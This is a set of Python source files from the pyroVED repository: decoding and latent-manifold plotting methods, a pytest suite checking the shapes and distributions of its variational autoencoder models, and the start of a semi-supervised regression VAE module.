z_scale, y_pred\n\n def decode(self, z: torch.Tensor, y: torch.Tensor, **kwargs: int) -> torch.Tensor:\n \"\"\"\n Decodes a batch of latent coordinates\n\n Args:\n z: Latent coordinates (without rotational and translational parts)\n y: Classes as one-hot vectors for each sample in z\n kwargs: Batch size as 'batch_size'\n \"\"\"\n z = torch.cat([z.to(self.device), y.to(self.device)], -1)\n loc = self._decode(z, **kwargs)\n return loc.view(-1, *self.data_dim)\n\n def manifold2d(self, d: int, plot: bool = True,\n **kwargs: Union[str, int, float]) -> torch.Tensor:\n \"\"\"\n Returns a learned latent manifold in the image space\n\n Args:\n d: Grid size\n plot: Plots the generated manifold (Default: True)\n kwargs: Keyword arguments include 'label' for class label (if any),\n custom min/max values for grid boundaries passed as 'z_coord'\n (e.g. z_coord = [-3, 3, -3, 3]), 'angle' and 'shift' to\n condition a generative model one, and plot parameters\n ('padding', 'padding_value', 'cmap', 'origin', 'ylim')\n \"\"\"\n z, (grid_x, grid_y) = generate_latent_grid(d, **kwargs)\n cls = tt(kwargs.get(\"label\", 0))\n if cls.ndim < 2:\n cls = to_onehot(cls.unsqueeze(0), self.num_classes)\n cls = cls.repeat(z.shape[0], 1)\n loc = self.decode(z, cls, **kwargs)\n if plot:\n if self.ndim == 2:\n plot_img_grid(\n loc, d,\n extent=[grid_x.min(), grid_x.max(), grid_y.min(), grid_y.max()],\n **kwargs)\n elif self.ndim == 1:\n plot_spect_grid(loc, d, **kwargs)\n return loc\n\n def manifold_traversal(self, d: int, cont_idx: int, cont_idx_fixed: int = 0,\n plot: bool = True, **kwargs: Union[str, int, float]\n ) -> torch.Tensor:\n \"\"\"\n Latent space traversal for continuous and discrete latent variables\n\n Args:\n d: Grid size\n cont_idx:\n Continuous latent variable used for plotting\n a latent manifold traversal\n cont_idx_fixed:\n Value which the remaining continuous latent variables are fixed at\n plot:\n Plots the generated manifold (Default: True)\n kwargs:\n Keyword arguments include custom min/max values for grid\n boundaries passed as 'z_coord' (e.g. z_coord = [-3, 3, -3, 3]),\n 'angle' and 'shift' to condition a generative model one,\n and plot parameters ('padding', 'padding_value', 'cmap', 'origin', 'ylim')\n \"\"\"\n num_samples = d**2\n disc_dim = self.num_classes\n cont_dim = self.z_dim - self.coord\n data_dim = self.data_dim\n # Get continuous and discrete latent coordinates\n samples_cont, samples_disc = generate_latent_grid_traversal(\n d, cont_dim, disc_dim, cont_idx, cont_idx_fixed, num_samples)\n # Pass discrete and continuous latent coordinates through a decoder\n decoded = self.decode(samples_cont, samples_disc, **kwargs)\n if plot:\n plot_grid_traversal(decoded, d, data_dim, disc_dim, **kwargs)\n return decoded\n" }, { "alpha_fraction": 0.5808394551277161, "alphanum_fraction": 0.6026319861412048, "avg_line_length": 39.348297119140625, "blob_id": "d6a6b47402b434fbe1077899c08cbd848cfe75f9", "content_id": "4c3f24bf8f375c106aabf463dbf541db560593ee", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 26064, "license_type": "permissive", "max_line_length": 95, "num_lines": 646, "path": "/tests/test_models.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "import sys\nfrom copy import deepcopy as dc\n\nimport torch\nimport pyro\nimport pyro.poutine as poutine\nimport pyro.distributions as dist\nimport pyro.infer as infer\nfrom pyro.poutine.enum_messenger import EnumMessenger\nimport pytest\nfrom numpy.testing import assert_equal, assert_\nfrom numpy import array_equal\n\nsys.path.append(\"../../\")\n\nfrom pyroved import models, nets, utils\n\ntt = torch.tensor\n\n\ndef get_traces(model, *args):\n guide_trace = pyro.poutine.trace(model.guide).get_trace(*args)\n model_trace = pyro.poutine.trace(\n pyro.poutine.replay(model.model, trace=guide_trace)).get_trace(*args)\n return guide_trace, model_trace\n\n\ndef get_enum_traces(model, x):\n guide_enum = EnumMessenger(first_available_dim=-2)\n model_enum = EnumMessenger()\n guide_ = guide_enum(\n infer.config_enumerate(model.guide, \"parallel\", expand=True))\n model_ = model_enum(model.model)\n guide_trace = poutine.trace(guide_, graph_type=\"flat\").get_trace(x)\n model_trace = poutine.trace(\n pyro.poutine.replay(model_, trace=guide_trace),\n graph_type=\"flat\").get_trace(x)\n return guide_trace, model_trace\n\n\ndef assert_weights_equal(m1, m2):\n eq_w = []\n for p1, p2 in zip(m1.values(), m2.values()):\n eq_w.append(array_equal(\n p1.detach().cpu().numpy(),\n p2.detach().cpu().numpy()))\n return all(eq_w)\n\n\[email protected](\n \"invariances, coord_exp\", [(None, 0), (['t'], 1)])\ndef test_base_vae_1d(invariances, coord_exp):\n data_dim = (8,)\n m = models.base.baseVAE(data_dim, invariances)\n assert_equal(m.coord, coord_exp)\n\n\[email protected](\n \"invariances, coord_exp\",\n [(None, 0), (['r'], 1), (['t'], 2), (['s'], 1), (['r', 's', 't'], 4)])\ndef test_base_vae_2d(invariances, coord_exp):\n data_dim = (8, 8)\n m = models.base.baseVAE(data_dim, invariances)\n assert_equal(m.coord, coord_exp)\n\n\[email protected](\"invariances\", [['r'], ['s'], ['r', 't']])\ndef test_base_vae_1d_exception(invariances):\n data_dim = (8,)\n with pytest.raises(ValueError) as context:\n _ = models.base.baseVAE(data_dim, invariances)\n assert_(\"For 1D data, the only invariance to enforce is translation\"\n in str(context.exception))\n\n\ndef test_base_vae_split_latent_1d():\n z = torch.randn(5, 3)\n m = models.base.baseVAE((8,), ['t'])\n phi, dx, sc, z = m._split_latent(z)\n assert_(phi is None)\n assert_(sc is None)\n assert_(isinstance(dx, torch.Tensor))\n assert_equal(dx.shape, (5, 1))\n assert_(abs(dx).sum() > 0)\n assert_(isinstance(z, torch.Tensor))\n assert_equal(z.shape, (5, 2))\n\n\ndef test_base_vae_split_latent_2d():\n z = torch.randn(5, 6)\n m = models.base.baseVAE((8, 8), ['r', 't', 's'])\n z_split = m._split_latent(z)\n assert_(all([isinstance(z_, torch.Tensor) for z_ in z_split]))\n assert_(z_split[0].shape, (5, 1))\n assert_(z_split[1].shape, (5, 2))\n assert_(z_split[2].shape, (5, 1))\n assert_(z_split[3].shape, (5, 1))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's'], ['s', 'r', 't']])\ndef test_trvae_sites_dims_2d(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(*data_dim)\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n model = models.iVAE(data_dim[1:], invariances=invariances)\n guide_trace, model_trace = get_traces(model, x)\n assert_equal(model_trace.nodes[\"latent\"]['value'].shape,\n (data_dim[0], coord+2))\n assert_equal(guide_trace.nodes[\"latent\"]['value'].shape,\n (data_dim[0], coord+2))\n assert_equal(model_trace.nodes[\"obs\"]['value'].shape,\n (data_dim[0], torch.prod(tt(data_dim[1:])).item()))\n\n\[email protected](\"invariances\", [None, ['t']])\ndef test_trvae_sites_dims_1d(invariances):\n data_dim = (3, 8)\n x = torch.randn(*data_dim)\n coord = 0 if invariances is None else len(invariances)\n model = models.iVAE(data_dim[1:], invariances=invariances)\n guide_trace, model_trace = get_traces(model, x)\n assert_equal(model_trace.nodes[\"latent\"]['value'].shape,\n (data_dim[0], coord+2))\n assert_equal(guide_trace.nodes[\"latent\"]['value'].shape,\n (data_dim[0], coord+2))\n assert_equal(model_trace.nodes[\"obs\"]['value'].shape,\n (data_dim[0], torch.prod(tt(data_dim[1:])).item()))\n\n\[email protected](\"invariances\", [None, ['t']])\[email protected](\"data_dim\", [(3, 8, 8), (3, 8)])\ndef test_trvae_sites_fn(data_dim, invariances):\n x = torch.randn(*data_dim)\n model = models.iVAE(data_dim[1:], invariances=invariances)\n guide_trace, model_trace = get_traces(model, x)\n assert_(isinstance(model_trace.nodes[\"latent\"]['fn'].base_dist, dist.Normal))\n assert_(isinstance(guide_trace.nodes[\"latent\"]['fn'].base_dist, dist.Normal))\n assert_(isinstance(model_trace.nodes[\"obs\"]['fn'].base_dist, dist.Bernoulli))\n\n\[email protected](\"input_dim, output_dim\",\n [((8,), (8, 8)), ((8, 8), (8,)),\n ((8,), (8,)), ((8, 8), (8, 8))])\ndef test_ved_sites_dims(input_dim, output_dim):\n x = torch.randn(2, 1, *input_dim)\n y = torch.randn(2, 1, *output_dim)\n model = models.VED(input_dim, output_dim)\n guide_trace, model_trace = get_traces(model, x, y)\n assert_equal(model_trace.nodes[\"z\"]['value'].shape,\n (x.shape[0], 2))\n assert_equal(guide_trace.nodes[\"z\"]['value'].shape,\n (x.shape[0], 2))\n assert_equal(model_trace.nodes[\"obs\"]['value'].shape,\n (y.shape[0], torch.prod(tt(output_dim)).item()))\n\n\[email protected](\"input_dim, output_dim\",\n [((8,), (8, 8)), ((8, 8), (8,)),\n ((8,), (8,)), ((8, 8), (8, 8))])\ndef test_ved_sites_fn(input_dim, output_dim):\n x = torch.randn(2, 1, *input_dim)\n y = torch.randn(2, 1, *output_dim)\n model = models.VED(input_dim, output_dim)\n guide_trace, model_trace = get_traces(model, x, y)\n assert_(isinstance(model_trace.nodes[\"z\"]['fn'].base_dist, dist.Normal))\n assert_(isinstance(guide_trace.nodes[\"z\"]['fn'].base_dist, dist.Normal))\n assert_(isinstance(model_trace.nodes[\"obs\"]['fn'].base_dist, dist.Bernoulli))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's'], ['s', 'r', 't']])\ndef test_jtrvae_cont_sites_dims_2d(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(*data_dim)\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n model = models.jiVAE(data_dim[1:], 2, 3, invariances=invariances)\n guide_trace, model_trace = get_enum_traces(model, x)\n assert_equal(model_trace.nodes[\"latent_cont\"]['value'].shape,\n (data_dim[0], coord+2))\n assert_equal(guide_trace.nodes[\"latent_cont\"]['value'].shape,\n (data_dim[0], coord+2))\n assert_equal(model_trace.nodes[\"obs\"]['value'].shape,\n (data_dim[0], torch.prod(tt(data_dim[1:])).item()))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's'], ['s', 'r', 't']])\ndef test_jtrvae_disc_sites_dims(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(*data_dim)\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n model = models.jiVAE(data_dim[1:], 2, 3, invariances=invariances)\n guide_trace, model_trace = get_enum_traces(model, x)\n assert_equal(model_trace.nodes[\"latent_disc\"]['value'].shape,\n (3, data_dim[0], 3))\n assert_equal(guide_trace.nodes[\"latent_disc\"]['value'].shape,\n (3, data_dim[0], 3))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's'], ['s', 'r', 't']])\ndef test_jtrvae_cont_sites_fn(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(*data_dim)\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n model = models.jiVAE(data_dim[1:], 2, 3, invariances=invariances)\n guide_trace, model_trace = get_enum_traces(model, x)\n assert_(isinstance(model_trace.nodes[\"latent_cont\"]['fn'].base_dist, dist.Normal))\n assert_(isinstance(guide_trace.nodes[\"latent_cont\"]['fn'].base_dist, dist.Normal))\n assert_(isinstance(model_trace.nodes[\"obs\"]['fn'].base_dist, dist.Bernoulli))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's'], ['s', 'r', 't']])\ndef test_jtrvae_disc_sites_fn(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(*data_dim)\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n model = models.jiVAE(data_dim[1:], 2, 3, invariances=invariances)\n guide_trace, model_trace = get_enum_traces(model, x)\n assert_(isinstance(model_trace.nodes[\"latent_disc\"]['fn'], dist.OneHotCategorical))\n assert_(isinstance(guide_trace.nodes[\"latent_disc\"]['fn'], dist.OneHotCategorical))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's'], ['s', 'r', 't']])\ndef test_sstrvae_cont_sites_dims(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(data_dim[0], torch.prod(tt(data_dim[1:])).item())\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n model = models.ssiVAE(data_dim[1:], 2, 3, invariances=invariances)\n guide_trace, model_trace = get_enum_traces(model, x)\n assert_equal(model_trace.nodes[\"z\"]['value'].shape,\n (3, data_dim[0], coord+2))\n assert_equal(guide_trace.nodes[\"z\"]['value'].shape,\n (3, data_dim[0], coord+2))\n assert_equal(model_trace.nodes[\"x\"]['value'].shape,\n (data_dim[0], torch.prod(tt(data_dim[1:])).item()))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's'], ['s', 'r', 't']])\ndef test_sstrvae_disc_sites_dims(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(data_dim[0], torch.prod(tt(data_dim[1:])).item())\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n model = models.ssiVAE(data_dim[1:], 2, 3, invariances=invariances)\n guide_trace, model_trace = get_enum_traces(model, x)\n assert_equal(model_trace.nodes[\"y\"]['value'].shape,\n (3, data_dim[0], 3))\n assert_equal(guide_trace.nodes[\"y\"]['value'].shape,\n (3, data_dim[0], 3))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's'], ['s', 'r', 't']])\ndef test_sstrvae_cont_sites_fn(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(data_dim[0], torch.prod(tt(data_dim[1:])).item())\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n model = models.ssiVAE(data_dim[1:], 2, 3, invariances=invariances)\n guide_trace, model_trace = get_enum_traces(model, x)\n assert_(isinstance(model_trace.nodes[\"z\"]['fn'].base_dist, dist.Normal))\n assert_(isinstance(guide_trace.nodes[\"z\"]['fn'].base_dist, dist.Normal))\n assert_(isinstance(model_trace.nodes[\"x\"]['fn'].base_dist, dist.Bernoulli))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's'], ['s', 'r', 't']])\ndef test_sstrvae_disc_sites_fn(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(data_dim[0], torch.prod(tt(data_dim[1:])).item())\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n model = models.ssiVAE(data_dim[1:], 2, 3, invariances=invariances)\n guide_trace, model_trace = get_enum_traces(model, x)\n assert_(isinstance(model_trace.nodes[\"y\"]['fn'], dist.OneHotCategorical))\n assert_(isinstance(guide_trace.nodes[\"y\"]['fn'], dist.OneHotCategorical))\n\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's'], ['s', 'r', 't']])\ndef test_ssregvae_cont_sites_dims(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(data_dim[0], torch.prod(tt(data_dim[1:])).item())\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n model = models.ss_reg_iVAE(data_dim[1:], 2, 3, invariances=invariances)\n guide_trace, model_trace = get_traces(model, x)\n assert_equal(model_trace.nodes[\"z\"]['value'].shape,\n (data_dim[0], coord+2))\n assert_equal(guide_trace.nodes[\"z\"]['value'].shape,\n (data_dim[0], coord+2))\n assert_equal(model_trace.nodes[\"x\"]['value'].shape,\n (data_dim[0], torch.prod(tt(data_dim[1:])).item()))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's'], ['s', 'r', 't']])\ndef test_ssregvae_disc_sites_dims(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(data_dim[0], torch.prod(tt(data_dim[1:])).item())\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n model = models.ss_reg_iVAE(data_dim[1:], 2, 3, invariances=invariances)\n guide_trace, model_trace = get_traces(model, x)\n assert_equal(model_trace.nodes[\"y\"]['value'].shape,\n (data_dim[0], 3))\n assert_equal(guide_trace.nodes[\"y\"]['value'].shape,\n (data_dim[0], 3))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's'], ['s', 'r', 't']])\ndef test_ssregvae_vae_sites_fn(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(data_dim[0], torch.prod(tt(data_dim[1:])).item())\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n model = models.ss_reg_iVAE(data_dim[1:], 2, 3, invariances=invariances)\n guide_trace, model_trace = get_traces(model, x)\n assert_(isinstance(model_trace.nodes[\"z\"]['fn'].base_dist, dist.Normal))\n assert_(isinstance(guide_trace.nodes[\"z\"]['fn'].base_dist, dist.Normal))\n assert_(isinstance(model_trace.nodes[\"x\"]['fn'].base_dist, dist.Bernoulli))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's'], ['s', 'r', 't']])\ndef test_ssregvae_reg_sites_fn(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(data_dim[0], torch.prod(tt(data_dim[1:])).item())\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n model = models.ss_reg_iVAE(data_dim[1:], 2, 3, invariances=invariances)\n guide_trace, model_trace = get_traces(model, x)\n assert_(isinstance(model_trace.nodes[\"y\"]['fn'].base_dist, dist.Normal))\n assert_(isinstance(guide_trace.nodes[\"y\"]['fn'].base_dist, dist.Normal))\n\n\[email protected](\n \"sampler, expected_dist\",\n [(\"gaussian\", dist.Normal), (\"bernoulli\", dist.Bernoulli),\n (\"continuous_bernoulli\", dist.ContinuousBernoulli)])\ndef test_trvae_decoder_sampler(sampler, expected_dist):\n data_dim = (2, 8, 8)\n x = torch.randn(*data_dim)\n model = models.iVAE(data_dim[1:], coord=1, sampler_d=sampler)\n _, model_trace = get_traces(model, x)\n assert_(isinstance(model_trace.nodes[\"obs\"]['fn'].base_dist, expected_dist))\n\n\[email protected](\n \"sampler, expected_dist\",\n [(\"gaussian\", dist.Normal), (\"bernoulli\", dist.Bernoulli),\n (\"continuous_bernoulli\", dist.ContinuousBernoulli)])\ndef test_ved_decoder_sampler(sampler, expected_dist):\n input_dim = (8, 8)\n output_dim = (8,)\n x = torch.randn(2, 1, *input_dim)\n y = torch.randn(2, 1, *output_dim)\n model = models.VED(input_dim, output_dim, sampler_d=sampler)\n _, model_trace = get_traces(model, x, y)\n assert_(isinstance(model_trace.nodes[\"obs\"]['fn'].base_dist, expected_dist))\n\n\[email protected](\n \"sampler, expected_dist\",\n [(\"gaussian\", dist.Normal), (\"bernoulli\", dist.Bernoulli),\n (\"continuous_bernoulli\", dist.ContinuousBernoulli)])\ndef test_jtrvae_decoder_sampler(sampler, expected_dist):\n data_dim = (2, 8, 8)\n x = torch.randn(*data_dim)\n model = models.jiVAE(data_dim[1:], 2, 3, coord=1, sampler_d=sampler)\n _, model_trace = get_enum_traces(model, x)\n assert_(isinstance(model_trace.nodes[\"obs\"]['fn'].base_dist, expected_dist))\n\n\[email protected](\n \"sampler, expected_dist\",\n [(\"gaussian\", dist.Normal), (\"bernoulli\", dist.Bernoulli),\n (\"continuous_bernoulli\", dist.ContinuousBernoulli)])\ndef test_sstrvae_decoder_sampler(sampler, expected_dist):\n data_dim = (2, 64)\n x = torch.randn(*data_dim)\n model = models.ssiVAE(data_dim[1:], 2, 3, coord=1, sampler_d=sampler)\n _, model_trace = get_enum_traces(model, x)\n assert_(isinstance(model_trace.nodes[\"x\"]['fn'].base_dist, expected_dist))\n\n\[email protected](\"data_dim\", [(2, 8), (2, 8, 8), (3, 8), (3, 8, 8)])\ndef test_basevae_encode_x(data_dim):\n x = torch.randn(*data_dim)\n vae = models.base.baseVAE(data_dim[1:], None)\n encoder_net = nets.fcEncoderNet(data_dim[1:], 2, 0)\n vae.set_encoder(encoder_net)\n encoded = vae._encode(x)\n assert_equal(encoded[:, :2].shape, (data_dim[0], 2))\n assert_equal(encoded[:, 2:].shape, (data_dim[0], 2))\n\n\ndef test_basevae_encode_xy():\n data_dim = (2, 64)\n x = torch.randn(*data_dim)\n alpha = torch.ones(data_dim[0], 3) / 3\n y = dist.OneHotCategorical(alpha).sample()\n vae = models.base.baseVAE(data_dim[1:], None)\n encoder_net = nets.fcEncoderNet(data_dim[1:], 2, 3)\n vae.set_encoder(encoder_net)\n encoded = vae._encode(x, y)\n assert_equal(encoded[:, :2].shape, (data_dim[0], 2))\n assert_equal(encoded[:, 2:].shape, (data_dim[0], 2))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's']])\ndef test_basevae_decode_x(invariances):\n data_dim = (3, 8, 8)\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n z = torch.randn(data_dim[0], 2)\n vae = models.base.baseVAE(data_dim[1:], invariances)\n vae.coord = coord\n vae.grid = utils.generate_grid(data_dim[1:]).to(vae.device)\n dnet = nets.sDecoderNet if 0 < coord < 5 else nets.fcDecoderNet\n decoder_net = dnet(data_dim[1:], 2)\n vae.set_decoder(decoder_net)\n decoded = vae._decode(z)\n assert_equal(decoded.squeeze().shape, data_dim)\n\n\[email protected](\"vae_model\", [models.jiVAE, models.ssiVAE])\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's']])\ndef test_jsstrvae_decode(vae_model, invariances):\n data_dim = (38, 8)\n model = vae_model(data_dim, 2, 3, invariances=invariances)\n z_coord = torch.tensor([0.0, 0.0]).unsqueeze(0)\n y = utils.to_onehot(torch.tensor(0).unsqueeze(0), 3)\n decoded = model.decode(z_coord, y)\n assert_equal(decoded.squeeze().shape, data_dim)\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's']])\ndef test_trvae_decode_2d(invariances):\n data_dim = (8, 8)\n model = models.iVAE(data_dim, invariances=invariances)\n z_coord = torch.tensor([0.0, 0.0]).unsqueeze(0)\n decoded = model.decode(z_coord)\n assert_equal(decoded.squeeze().shape, data_dim)\n\n\[email protected](\"invariances\", [None, ['t']])\ndef test_trvae_decode_1d(invariances):\n data_dim = (8,)\n model = models.iVAE(data_dim, invariances=invariances)\n z_coord = torch.tensor([0.0, 0.0]).unsqueeze(0)\n decoded = model.decode(z_coord)\n assert_equal(decoded.squeeze().shape, data_dim)\n\n\[email protected](\"input_dim, output_dim\",\n [((8,), (8, 8)), ((8, 8), (8,)),\n ((8,), (8,)), ((8, 8), (8, 8))])\ndef test_ved_decode(input_dim, output_dim):\n z_coord = torch.tensor([0.0, 0.0]).unsqueeze(0)\n model = models.VED(input_dim, output_dim)\n decoded = model.decode(z_coord)\n assert_equal(decoded.squeeze().shape, output_dim)\n\n\[email protected](\"input_dim, output_dim\",\n [((8,), (8, 8)), ((8, 8), (8,)),\n ((8,), (8,)), ((8, 8), (8, 8))])\ndef test_ved_predict(input_dim, output_dim):\n x = torch.randn(2, 1, *input_dim)\n model = models.VED(input_dim, output_dim)\n prediction, _ = model.predict(x)\n assert_equal(prediction.squeeze().shape, (2, *output_dim))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['r', 't', 's']])\ndef test_ctrvae_decode(invariances):\n data_dim = (8, 8)\n model = models.iVAE(data_dim, c_dim=3, invariances=invariances)\n z_coord = torch.tensor([0.0, 0.0]).unsqueeze(0)\n y = utils.to_onehot(torch.tensor(0).unsqueeze(0), 3)\n decoded = model.decode(z_coord, y)\n assert_equal(decoded.squeeze().shape, data_dim)\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['t'], ['r', 't', 's']])\ndef test_trvae_encode_2d(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(*data_dim)\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances and len(data_dim[1:]) == 2:\n coord = coord + 1\n model = models.iVAE(data_dim[1:], 2, invariances=invariances)\n encoded = model.encode(x)\n assert_equal(encoded[0].shape, (data_dim[0], coord+2))\n assert_equal(encoded[0].shape, encoded[1].shape)\n\n\[email protected](\"invariances\", [None, ['t']])\ndef test_trvae_encode_1d(invariances):\n data_dim = (3, 8)\n x = torch.randn(*data_dim)\n coord = 0 if invariances is None else len(invariances)\n model = models.iVAE(data_dim[1:], 2, invariances=invariances)\n encoded = model.encode(x)\n assert_equal(encoded[0].shape, (data_dim[0], coord+2))\n assert_equal(encoded[0].shape, encoded[1].shape)\n\n\[email protected](\"input_dim, output_dim\",\n [((8,), (8, 8)), ((8, 8), (8,)),\n ((8,), (8,)), ((8, 8), (8, 8))])\ndef test_ved_encode(input_dim, output_dim):\n x = torch.randn(2, 1, *input_dim)\n model = models.VED(input_dim, output_dim)\n encoded = model.encode(x)\n assert_equal(encoded[0].shape, (x.shape[0], 2))\n assert_equal(encoded[0].shape, encoded[1].shape)\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['t'], ['r', 't', 's']])\ndef test_jtrvae_encode(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(*data_dim)\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances:\n coord = coord + 1\n model = models.jiVAE(data_dim[1:], 2, 3, invariances=invariances)\n encoded = model.encode(x)\n assert_equal(encoded[0].shape, encoded[1].shape)\n assert_equal(encoded[0].shape, (data_dim[0], coord+2))\n assert_equal(encoded[2].shape, (data_dim[0],))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['t'], ['r', 't', 's']])\ndef test_sstrvae_encode(invariances):\n data_dim = (3, 8, 8)\n x = torch.randn(data_dim[0], torch.prod(tt(data_dim[1:])).item())\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances:\n coord = coord + 1\n model = models.ssiVAE(data_dim[1:], 2, 5, invariances=invariances)\n encoded = model.encode(x)\n assert_equal(encoded[0].shape, encoded[1].shape)\n assert_equal(encoded[0].shape, (data_dim[0], coord+2))\n assert_equal(encoded[2].shape, (data_dim[0],))\n\n\[email protected](\"num_classes\", [0, 2, 3])\[email protected](\"invariances\", [None, ['r'], ['s'], ['t'], ['r', 't', 's']])\ndef test_trvae_manifold2d(invariances, num_classes):\n data_dim = (8, 8)\n model = models.iVAE(data_dim, c_dim=num_classes, invariances=invariances)\n y = None\n if num_classes > 0:\n y = utils.to_onehot(torch.tensor(0).unsqueeze(0), num_classes)\n decoded_grid = model.manifold2d(4, y, plot=True)\n assert_equal(decoded_grid.squeeze().shape, (16, *data_dim))\n\n\[email protected](\"input_dim, output_dim\",\n [((8,), (8, 8)), ((8, 8), (8,)),\n ((8,), (8,)), ((8, 8), (8, 8))])\ndef test_ved_manifold2d(input_dim, output_dim):\n model = models.VED(input_dim, output_dim)\n decoded_grid = model.manifold2d(4, plot=True)\n assert_equal(decoded_grid.squeeze().shape, (16, *output_dim))\n\n\[email protected](\"vae_model\", [models.jiVAE, models.ssiVAE])\[email protected](\"invariances\", [None, ['r'], ['s'], ['t'], ['r', 't', 's']])\ndef test_jsstrvae_manifold2d(vae_model, invariances):\n data_dim = (8, 8)\n model = vae_model(data_dim, 2, 3, invariances=invariances)\n decoded_grid = model.manifold2d(4, plot=True)\n assert_equal(decoded_grid.squeeze().shape, (16, *data_dim))\n\n\[email protected](scope='session')\[email protected](\"invariances\", [None, ['r'], ['s'], ['t'], ['r', 't', 's']])\ndef test_save_load_basevae(invariances):\n data_dim = (5, 8, 8)\n coord = 0\n if invariances is not None:\n coord = len(invariances)\n if 't' in invariances:\n coord = coord + 1\n vae = models.base.baseVAE()\n encoder_net = nets.fcEncoderNet(data_dim[1:], 2+coord, 0)\n dnet = nets.sDecoderNet if 0 < coord < 5 else nets.fcDecoderNet\n decoder_net = dnet(data_dim, 2, 0)\n vae.set_encoder(encoder_net)\n vae.set_decoder(decoder_net)\n weights_init = dc(vae.state_dict())\n vae.save_weights(\"my_weights\")\n vae.load_weights(\"my_weights.pt\")\n weights_loaded = vae.state_dict()\n assert_(assert_weights_equal(weights_loaded, weights_init))" }, { "alpha_fraction": 0.5469996333122253, "alphanum_fraction": 0.5520685911178589, "avg_line_length": 38.68935012817383, "blob_id": "afb5bed9be912ede9073b0b474ec0717e75441b0", "content_id": "5d1cac410d1e1ec2303007fe4b53fae014226598", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13415, "license_type": "permissive", "max_line_length": 87, "num_lines": 338, "path": "/pyroved/models/ss_reg_ivae.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "\"\"\"\nss_reg_ivae.py\n==============\n\nVariational autoencoder for semi-supervised regression\nwith an option to enforce orientational, positional and scale\ninvariances\n\nCreated by Maxim Ziatdinov (email: [email protected])\n\"\"\"\nfrom typing import List, Optional, Tuple, Type, Union\n\nimport pyro\nimport pyro.distributions as dist\nimport torch\n\nfrom ..nets import fcDecoderNet, fcEncoderNet, fcRegressorNet, sDecoderNet\nfrom ..utils import (generate_latent_grid, get_sampler, init_dataloader,\n plot_img_grid, plot_spect_grid, set_deterministic_mode,\n transform_coordinates)\nfrom .base import baseVAE\n\n\nclass ss_reg_iVAE(baseVAE):\n \"\"\"\n Semi-supervised variational autoencoder for regression tasks\n with the enforcement 